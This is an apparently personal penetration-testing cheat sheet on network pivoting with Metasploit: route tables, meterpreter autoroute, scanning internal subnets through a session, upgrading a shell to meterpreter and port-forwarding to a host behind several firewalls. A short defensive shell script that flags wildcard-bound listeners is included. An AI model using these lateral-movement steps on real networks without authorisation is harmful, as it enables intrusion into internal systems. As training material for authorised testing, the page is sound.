# 💻Networking

## Routing

### get route table:

```
ip route
route -n
```

### add a route

```
ip route add <net_id>/<mask> via <net_gateway>
```

meterpreter:

```
# the trailing 1 is the session you want this route added to
route add x.x.x.0/24 1
route list
# You should see the route now.

# Then go back into your session by:
sessions -i 1
```

{% embed url="<https://www.offensive-security.com/metasploit-unleashed/pivoting>" %}
I followed this guide then portfwd add for whatever port I found
{% endembed %}

{% embed url="<https://www.youtube.com/watch?v=MeSql-3aOsM>" %}

```
use auxiliary/scanner/discovery/udp_probe
set RHOSTS <target_ip>

# route inside the session, so the UDP probes are sent following this routing rule
route add <target_ip>/24 1
route print

# 20 hosts at the same time
set THREADS 20
run
```

{% embed url="<https://www.youtube.com/watch?v=Zu8SixuIMww>" %}

```bash
# Inside a meterpreter session:

meterpreter > run autoroute -s <new_ip_found_inside_target>/24
# print all routes
meterpreter > run autoroute -p

# Now the routing is done inside Metasploit, so let's scan the network through it
background
# for Windows environments
use auxiliary/scanner/netbios/nbname

set RHOSTS <new_net_ip>/24
run

# Found a new IP: time for a port scan of the new target
use auxiliary/scanner/portscan/tcp
set RHOSTS <new_TARGET_Discovered_using_first_target_IP>
set THREADS 5
run

# Then use another auxiliary module to discover the version of the daemon found
# e.g. ftp

use auxiliary/scanner/ftp/ftp_version
set RHOSTS <new_TARGET_Discovered_IP>
run

# Then you can search for an exploit for that ftp banner.
# You would probably get a shell, which you can upgrade with the shell_to_meterpreter module

use post/multi/manage/shell_to_meterpreter
set LHOST <first_target_in_new_net_IP>
set SESSION <shell_session_id>
run

# Now you have a new session: the meterpreter one
sessions -i <new_meter_session>

# Then repeat the same thing with the new session
meterpreter > run autoroute -s <2nd_target_ip_net>/24
background

route print

# Assuming the 2nd target is connected to
# a 3rd target that runs on TCP:80
# (you found the 3rd target
# by repeating the steps above inside the 2nd target):

sessions -i <2nd_target_session_id>
# -l local port, -p remote port, -r remote host
meterpreter > portfwd add -l 8888 -p 80 -r <third_target_ip>

# Now your device can connect to the 3rd target's webapp
# (which was behind 3 firewalls)

# Now, on your own machine:
netstat -altp

# You will see 0.0.0.0:8888 listening, owned by ruby
```
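The `0.0.0.0:8888` listener above is bound to every interface, so anything that can reach your machine can reach the forwarded service. As an added example (not from the original notes), this reads `netstat`-style output and lists wildcard-bound TCP listeners; the sample lines, PIDs and function names are constructed for illustration:

```shell
# Flag TCP listeners that are bound to all interfaces.
# Expects `netstat -ltnp` style columns:
# Proto Recv-Q Send-Q Local Foreign State PID/Program

wildcard_listeners() {
  # stdin: netstat output; stdout: "<port> <pid/program>" per wildcard listener
  awk '
    $1 ~ /^tcp/ && $6 == "LISTEN" {
      addr = $4
      n = split(addr, parts, ":")
      port = parts[n]                       # last field is always the port
      host = substr(addr, 1, length(addr) - length(port) - 1)
      if (host == "0.0.0.0" || host == "::" || host == "[::]" || host == "*")
        print port, ($7 == "" ? "-" : $7)
    }'
}

port_is_exposed() {
  # $1 = port number; returns 0 if that port listens on a wildcard address
  wildcard_listeners | awk -v p="$1" '$1 == p { found = 1 } END { exit !found }'
}

# Constructed sample, modelled on the output described in the notes above.
SAMPLE='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      4242/ruby
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      911/postgres
tcp6       0      0 :::22                   :::*                    LISTEN      700/sshd
tcp        0      0 10.0.0.5:51514          10.0.0.9:4444           ESTABLISHED 4242/ruby'

printf '%s\n' "$SAMPLE" | wildcard_listeners
```

On a live box, pipe `netstat -ltnp` into `wildcard_listeners`; if the forwarded port shows up, restrict it with a host firewall rule or bind the forward to `127.0.0.1` (portfwd's `-L` option).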

{% embed url="<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/manage/shell_to_meterpreter.md>" %}
Upgrade a shell to meterpreter over a pivot
{% endembed %}

{% embed url="<https://www.jaacostan.com/2021/06/pivoting-via-meterpreter-metasploit-v6x.html>" %}

